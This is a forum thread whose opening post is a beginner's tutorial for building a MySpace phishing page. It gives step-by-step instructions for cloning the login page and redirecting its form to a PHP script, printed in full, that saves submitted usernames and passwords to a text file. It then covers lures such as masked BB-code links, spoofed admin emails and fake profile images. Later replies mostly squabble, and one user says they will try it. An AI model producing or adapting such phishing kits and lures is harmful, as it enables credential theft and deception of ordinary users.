Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Programming Tutorials › Phishing for Dummies.

Phishing for Dummies.

Posts 1–9 of 9 · Page 1 of 1
HazedUp
HazedUp
Phishing for Dummies.
1. Intro
There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.

-This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in MYSPACE, open anyone's profile and click on his picture. That will lead you to MYSPACE's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the MYSPACE page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.spam.com/index.php' - where 'xxx' is the name of your account.

But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:


Code:
<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUwY3RsMDAkT ​ WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGwwMCRNYWluJFNwbGFza ​ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" />
</div>
and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.

Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:


Code:
<?php
header ('Location: http://myspace.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).
Congratulations! You have a phisher!Superman
The link to your phish site is:
http://xxx.spam.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.spam.com/passwords.txt
Or you may access it from your account.

Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.

4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing this:


Code:
[url =YourPhishSiteLink] TheOriginalSiteLink[/url]<~~Delete Spaces.
For example, Google looks like a google, but it leads you to yahoo when you click it.

If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.


Code:
[url = YourPhishSiteLink] [img]link of the image[/img][/url]<~~Once again delete spaces.
When sending emails see for the option 'hyperlink', and it's self explainable once you see it.
There are many other ways, and as I said, your creativity is the limit.

5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a phisher, and how it works. Although is written for Myspace, the procedure is equivalent for almost every other login site(for hotmail is different). After this, it's up to you to explore, experiment and dive in the world of social engineering.


SOME CREDITS GO TO ME! OTHER CREDITS GO TO CROW MY FRIEND!

Thank me.
#1 · 17y ago
GG2GG
GG2GG
no credit goes to you, dont chat shit -.- and asking for thanks is against mpgh's rules
#2 · 17y ago
Bito
Bito
Thanks for the TUT ill try it out tonight
#3 · 17y ago
HazedUp
HazedUp
Quote Originally Posted by GG2GG View Post
no credit goes to you, dont chat shit -.- and asking for thanks is against mpgh's rules
Why don't you just leave, Shut the fuck up, and get the fuck out of my threads.
#4 · 17y ago
-DOG-
-DOG-
lol fail!!

u just copy and pasted ROFL!!


i know where u got it.. just dont want to advertise...

or copy and paste this in google

Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
#5 · 17y ago
-DOG-
-DOG-
ops tried to edit.. but couldnt
#6 · 17y ago
radnomguywfq3
radnomguywfq3
Quote Originally Posted by HazedUp View Post
Why don't you just leave, Shut the fuck up, and get the fuck out of my threads.

Mother fucker,, don't flame the mother fucking thread biatch.
#7 · 17y ago
Sjoerd
Sjoerd
Jetamay stop flaming
#8 · 17y ago
epicdjgo
epicdjgo
What is a good website for hosting?
#9 · 10y ago
Posts 1–9 of 9 · Page 1 of 1

Post a Reply

Similar Threads

  • Free Phishing For all!By noobi4life in WarRock - International Hacks
    1Last post 18y ago
  • Multi Client for DUMMIESBy Hitman 47 in Dragon Nest Hacks & Cheats
    137Last post 14y ago
  • Hacking for dummys?By one44 in Combat Arms Hacks & Cheats
    15Last post 17y ago
  • [Source]Visual Basic Phishing Files for warrock (client + server)By HeXel in Trade Accounts/Keys/Items
    9Last post 18y ago
  • My warrock phishing software source files for cheapBy HeXel in Trade Accounts/Keys/Items
    7Last post 18y ago

Tags for this Thread

#dummies#phishing